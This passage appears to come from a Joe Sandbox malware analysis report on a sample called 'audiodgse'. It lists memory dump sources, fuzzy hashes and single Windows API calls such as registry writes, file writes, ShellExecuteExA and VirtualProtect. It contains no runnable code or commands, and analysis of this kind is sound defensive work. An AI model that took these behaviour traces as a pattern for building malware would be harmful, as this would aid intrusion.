                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 4b8514f2948a69a262e82f33fa022d4a9f69571b37429ea5f8efa3dae65c7b89
                                                  • Instruction ID: c902753f0fef42a8737feeee641d3f834d88dea76f8878004f7754b13aaf3ab4
                                                  • Opcode Fuzzy Hash: 4b8514f2948a69a262e82f33fa022d4a9f69571b37429ea5f8efa3dae65c7b89
                                                  • Instruction Fuzzy Hash: 9E415ABBD40204DFEB21DFBAD881B593B75EB14394F20593DE607C7241D73895818BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: wsprintf
                                                  • String ID:
                                                  • API String ID: 2111968516-0
                                                  • Opcode ID: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                  • Instruction ID: 3a2c95f3f261f3e7b92da62a1208cffd6d7f8b014e901ac2ca999815bcbce589
                                                  • Opcode Fuzzy Hash: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                  • Instruction Fuzzy Hash: 2D21C770C0428AAADF219F644A456BFBB709B11318F14447FE891B63D1C1BD9981CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
                                                    • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                                  • Instruction ID: f53dea761aa5693b03f4aeaa9096613f160725ff62c28ab2a383c2bfee997f34
                                                  • Opcode Fuzzy Hash: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                                  • Instruction Fuzzy Hash: 5AE0EDB1A04215BBD702AB95AE89DBE776CEB44315F10043BF201F11C1C67D4941966E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
                                                  • Instruction ID: fe35eca7c2654f279d717fea31bdeaa6937bb5491eee9e26a1e5aab6719f7fed
                                                  • Opcode Fuzzy Hash: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
                                                  • Instruction Fuzzy Hash: B2E04F31A003256BDB213EB25E8ED6F3669AB84744B16113BFA01BA2C2D9BC1C05C26D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00405EB7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                                  • Instruction ID: 95beb03159e1ed36dc188c03c0911f4594c5194c551a9f11594fd4679c6f4357
                                                  • Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                                  • Instruction Fuzzy Hash: 23E0ECB2014109BEEF095F90ED0ADBB371DEB04315F00492EFA06E4090E7B5A920AA75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405C2E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                  • Instruction ID: 28dd51bc99cbbe9e43bc3b4155210361b58306b45153a5fd00399a3e640b4bcc
                                                  • Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                  • Instruction Fuzzy Hash: 3AE0EC3261835AABEF249E559C01EEB7B6CEB05360F044472FD15E6150D231E8219FA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405BFF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                  • Instruction ID: 7d11c2845e787d99b8eae26fbbcce04266139d1862b3a193897eab19ac9c5e73
                                                  • Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                  • Instruction Fuzzy Hash: 72E0E632558759ABDF106E559C00AEB775CEB45754F004832FE15E3150D231E8519BE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(72BE404C,00000004,00000040,72BE403C), ref: 72BE293F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 6b639b1631e3a41f39713d910e8caefc7f08b6b2da29fc08a515396a1ac554d5
                                                  • Instruction ID: d987c0d98c12b2eb65ca3297c6a217278e321ef906a9cebf6d4a964e201f0182
                                                  • Opcode Fuzzy Hash: 6b639b1631e3a41f39713d910e8caefc7f08b6b2da29fc08a515396a1ac554d5
                                                  • Instruction Fuzzy Hash: 42F092B3D88281DEC3B1CF7A84447053FF0A318295F224D3EE599D7243E33840448B15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
                                                  • Instruction ID: 87433fbf28b19ed2e9e97c64dce3a42f5842ec6a66e9b0e36d30645c49e8dc10
                                                  • Opcode Fuzzy Hash: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
                                                  • Instruction Fuzzy Hash: 92E01230904309BAEB02AFB08D09EBE3E79EF05710F10042AB9606A0D2E6B89542D75E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(00000000,?,00000000,?,?), ref: 00405E84
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                  • Instruction ID: 31d842323d9a2f535784a2c12e989c9eb1b9f9f44251d53ba3eec0f14c414acf
                                                  • Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                  • Instruction Fuzzy Hash: 75D0EC3204420DBADF115F90ED05FAB371DEB14355F004522FE05A4090D2769520AA55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                  • Instruction ID: d5005c83e4bc13d794db0995845c4037c46dc405a88debeb1123cd551caf7fcc
                                                  • Opcode Fuzzy Hash: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                  • Instruction Fuzzy Hash: F5D05BB2B08200EBCB11DFE8EF08A5E77B5EB54325F204577E101F21D1D2B88641975A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                  • Instruction ID: d19a9dbcf4508c1e9b2ca47d0762ffb16ec5c10abf7e35186d5f4f0c6b5da105
                                                  • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                  • Instruction Fuzzy Hash: F9C04C71754201BAEA319B50DD49F0777586750B00F5584257314F60D1C6B4E451D62D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                  • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                  • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                  • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                  • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                                  • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                  • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ShellExecuteExA.SHELL32(?,004044AF,?), ref: 004056CB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID:
                                                  • API String ID: 587946157-0
                                                  • Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                  • Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
                                                  • Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                  • Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403E66), ref: 00404094
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
